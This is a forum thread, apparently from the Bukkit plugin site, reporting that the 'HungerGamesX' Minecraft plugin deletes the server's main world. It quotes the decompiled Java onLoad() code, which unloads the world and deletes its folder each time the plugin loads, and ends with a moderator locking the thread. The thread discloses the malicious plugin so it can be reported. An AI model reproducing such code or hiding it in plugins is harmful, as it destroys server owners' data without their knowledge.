Dangerous plugin was accepted, lot of comments it is dangerous and still not removed?

Hello,

A customer of a hosting compagny I work for asked me today why his world was deleted. He was just adding a plugin. He gave me the plugin and I decompiled it and immediatly saw some dangerous code that removes the "world" mainworld.

http://dev.bukkit.org/bukkit-plugins/hungergamesx (The dagerous code is in onLoad() in the mainclass)

Please delete this project, as it's dangerous. I wonder how this was accepted, because it's not really hidden or something...

 

I can indeed confirm this, this is clearly not done by accident, as the auther forces a delete of /world:


However this is questionable, due to HG plugins usually delete a world after restart. But never the less this should be pointed out to the user, and the word should be configurable... and a force delete is Soooooooo ugly

Disclaimer: Decompiling code is against the copyrights of the author unless used to detect the source of an already existing problem like a deleted world.

 

I can confirm this too:

Code:java

  public void onLoad()
  {
    String currentDir = System.getProperty("user.dir");
    File deneme = new File(currentDir + "/world");
    getServer().unloadWorld("world", false);
    deleteFolder(deneme);
    deneme.exists();
 
    getLogger().info("Hunger Games plugini acikken reload cekmeniz hataya yol acacaktir!");
  }

 

Report the project using the little in the bottom right corner of the project page.

Also, all the files seem to have this code in it

 

Removed a couple offtopic posts.

Locked. The best way to let us know about a potentially malicious plugin is to use the report functionality built into BukkitDev. We will investigate this reported potential plugin and deal with it accordingly.